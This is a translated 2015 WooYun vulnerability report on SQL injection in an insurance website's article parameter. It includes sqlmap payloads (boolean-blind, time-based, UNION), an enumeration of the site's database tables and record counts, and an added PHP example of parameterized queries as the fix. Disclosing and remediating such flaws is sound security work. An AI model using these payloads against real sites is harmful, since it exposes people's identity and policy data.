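Vulnerability summary

Bug ID: wooyun-2015-0134408

Title: SQL injection on 联保网 leaks the insurance policy data of more than 10,000 people

Vendor: CNCERT (National Internet Emergency Center)

Author: me1ody

Submitted: 2015-08-19 23:05

Fixed: 2015-10-05 17:46

Published: 2015-10-05 17:46

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]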


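Vulnerability details

Disclosure status:

2015-08-19: Details sent to the vendor; waiting for the vendor to handle them
2015-08-21: CNCERT has not yet been able to contact the organization concerned; details are disclosed only to the notifying institutions
2015-08-31: Details disclosed to core white hats and experts in related fields
2015-09-10: Details disclosed to regular white hats
2015-09-20: Details disclosed to intern white hats
2015-10-05: Details disclosed to the public

Brief description:

The injection leads to a data leak,
including names, ID card numbers, household registration type, mobile numbers, addresses and policy contents,
for both personal insurance and vehicle insurance.

Detailed description:

Injection point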

http://**.**.**.**/article.php?aid=42


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: aid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: aid=42 AND 2005=2005
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] sq_lianb140728
No tables found
Database: sq_lianb140728
[11 tables]
+--------------+
| artical |
| artical2 |
| autoInfos |
| car_infos |
| cardtype |
| ins_info |
| insco |
| owner |
| salesman |
| servers |
| vchicle_type |
+--------------+
Database: sq_lianb140728
+--------------+---------+
| Table | Entries |
+--------------+---------+
| ins_info | 14700 |
| car_infos | 475 |
| autoInfos | 249 |
| vchicle_type | 61 |
| salesman | 51 |
| artical | 43 |
| artical2 | 43 |
| owner | 42 |
| cardtype | 18 |
| servers | 9 |
| insco | 6 |
+--------------+---------+
Database: sq_lianb140728
Table: ins_info
[11 entries]
Database: sq_lianb140728
Table: car_infos
[5 entries]

Proof of vulnerability:

(Screenshots: 1.png, 2.png, 3.png)

Remediation:

Injection
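
An added example (not code from the report or from the affected site) of the fix the remediation field points to: an `aid` lookup built by string concatenation next to a validated, parameterized version. The table layout, function names and sample row are hypothetical, an in-memory SQLite database stands in for the MySQL back end so it runs offline, and the UNION input is a SQLite-compatible shortening of the payload shown in the sqlmap output.

```php
<?php
// Added example: table, columns, function names and the sample row are hypothetical.

function open_demo_db(): PDO
{
    // In-memory SQLite stands in for the MySQL back end so the demo runs offline.
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE article (aid INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO article VALUES (42, 'constructed sample article')");
    return $pdo;
}

// Vulnerable pattern: the request value becomes part of the SQL text.
function find_article_vulnerable(PDO $pdo, string $aid): array
{
    $sql = 'SELECT title FROM article WHERE aid = ' . $aid;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
// With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the server
// receives the statement and the value separately.
function find_article(PDO $pdo, string $aid): array
{
    $id = filter_var($aid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];  // not a plain positive integer: never reaches the database
    }
    $stmt = $pdo->prepare('SELECT title FROM article WHERE aid = :aid');
    $stmt->bindValue(':aid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$pdo = open_demo_db();
// Constructed inputs: a normal id, the boolean test from the sqlmap output,
// and a SQLite-compatible shortening of its UNION payload.
$inputs = ['42', '42 AND 2005=2005', "-9624 UNION ALL SELECT 'qqqbq'"];
foreach ($inputs as $aid) {
    printf("%-32s vulnerable=%s hardened=%s\n", $aid,
        json_encode(find_article_vulnerable($pdo, $aid)),
        json_encode(find_article($pdo, $aid)));
}
```

The two injected inputs return rows from the concatenated query and an empty result from the parameterized one.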

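Copyright notice: please credit the source when reposting: me1ody@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 17

Confirmed: 2015-08-21 17:45

Vendor reply:

CNVD confirms the situation described and has notified the organization that manages the website through the contact details published on the site.

Latest status:

None yet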